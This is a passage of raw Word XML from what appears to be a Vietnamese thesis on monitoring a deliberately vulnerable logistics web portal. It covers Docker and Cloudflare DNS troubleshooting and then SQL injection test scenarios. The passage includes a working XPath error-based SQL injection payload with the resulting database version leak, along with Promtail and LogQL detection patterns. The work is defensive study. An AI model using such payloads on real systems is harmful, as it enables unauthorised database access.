        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên máy chủ VPS xác nhận container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vẫn đang ở trạng thái khỏe mạnh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân tích nguyên nhân gốc rễ sự cố:</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Hệ thống Reverse Proxy sử dụng container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>proxy-manager-app-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Nginx Proxy Manager) thuộc mạng Docker riêng biệt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>proxy-manager_default</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Cấu hình Nginx Proxy Host định tuyến tên miền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tới địa chỉ nội bộ là hostname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên cổng 80.</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val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi mạng Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> được tái tạo hoặc cập nhật trong quá trình triển khai, container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>proxy-manager-app-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị ngắt kết nối khỏi mạng này.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Động cơ phân giải tên miền nội bộ của Nginx trong container NPM không thể tìm thấy địa chỉ IP của container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, dẫn tới lỗi không thể kết nối tới máy chủ ứng dụng và Cloudflare lập tức trả về mã lỗi 502 Bad Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giải pháp khắc phục:</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Thực thi lệnh gắn kết container Reverse Proxy vào mạng bridge của ứng dụng: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docker network connect inlaneweb_net proxy-manager-app-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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Nginx ngay lập tức phân giải được hostname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, lưu lượng HTTP được phục hồi thông suốt và mã phản hồi trả về trạng thái HTTP 200 OK bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3.6. Sự cố không phân giải được tên miền phụ Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Triệu chứng sự cố:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quản trị viên truy cập vào địa chỉ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>https://grafana.ecotools.online/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhưng trình duyệt thông báo lỗi không thể tìm thấy máy chủ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ERR_NAME_NOT_RESOLVED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Phân tích nguyên nhân gốc rễ sự cố:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tên miền gốc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> được ủy quyền quản lý DNS tại Cloudflare. Khi nhóm nghiên cứu khởi tạo Proxy Host trong Nginx Proxy Manager cho tên miền phụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>grafana.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, bản ghi DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>CNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tương ứng cho tiền tố </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>grafana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chưa được khai báo trên bảng quản lý DNS của Cloudflare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giải pháp khắc phục:</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sz w:val="26"/>
        </w:rPr>
        <w:t>Cấu hình bản ghi DNS trên Cloudflare:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tạo bản ghi loại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> với tên là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>grafana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, giá trị trỏ về địa chỉ máy chủ VPS và kích hoạt trạng thái bảo vệ qua đám mây của Cloudflare.</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sz w:val="26"/>
        </w:rPr>
        <w:t>Cấu hình Proxy Host trên Nginx Proxy Manager:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Định tuyến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>grafana.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tới container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_grafana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên cổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Kích hoạt tính năng Websockets Support và chứng chỉ SSL để bảo mật kênh truyền dữ liệu thời gian thực.</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val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sau khi DNS phân giải toàn cầu (thời gian lan truyền dưới 30 giây), quản trị viên có thể truy cập cổng giám sát bảo mật hoàn chỉnh qua giao thức HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>5.4. Các kịch bản tấn công thực tế và cách phát hiện qua log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong quá trình đánh giá an ninh thực nghiệm, hệ thống InlaneWeb Logistics Portal đã được nhóm nghiên cứu tiến hành kiểm thử xâm nhập chuyên sâu với 14 kịch bản khai thác lỗ hổng tiêm mã SQL Injection (bao quát từ các kỹ thuật khai thác dựa trên thông báo lỗi XPath, kỹ thuật kết hợp dữ liệu UNION-based, đến các kỹ thuật khai thác mù Boolean-based và Time-based). Dưới đây là phân tích chi tiết 4 kịch bản điển hình đại diện cho năng lực giám sát và phát hiện xâm nhập của hệ thống:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4.1. Tấn công trích xuất dữ liệu bằng thông báo lỗi XPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Điểm cuối bị tấn công:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /ports/{code}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Lỗ hổng V2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Payload khai thác:</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GET /ports/CNSHA' AND extractvalue(1, concat(0x7e, (SELECT @@version), 0x7e))-- - HTTP/1.1</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Host: inlaneweb.ecotools.online</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mã HTTP Response và nội dung trả về:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, nội dung HTML trả về làm lộ chuỗi phiên bản cơ sở dữ liệu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>XPATH syntax error: '~10.11.8-MariaDB-1:10.11.8+maria~ubu2204~'</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Quy tắc Promtail thu thập:</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Apache CustomLog JSON ghi nhận trường </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa chuỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>extractvalue</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Promtail kích hoạt Quy tắc 4A (Phát hiện tấn công SQL), bóc tách trường URI, khớp mẫu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>extractvalue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vuln_category="sqli"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="critical"</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val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Lỗi nội bộ database được InlaneLogger ghi nhận vào STDOUT/STDERR, Promtail Quy tắc 1 gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>log_category="app_exception"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Hiển thị trên Grafana:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 2 cảnh báo dòng đỏ với nội dung payload và IP kẻ tấn công; Panel 6 hiển thị tần suất lỗi rò rỉ dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cú pháp lọc LogQL trên Grafana:</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{container="ilfreight_web", vuln_category="sqli"} | json | uri =~ "(?i).*extractvalue.*"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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{container="ilfreight_web"} |~ "(?i)XPATH syntax error"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4.2. Tấn công ghép bảng đọc dữ liệu nhạy cảm bằng kỹ thuật UNION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Điểm cuối bị tấn công:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /ports?q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Lỗ hổng V1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
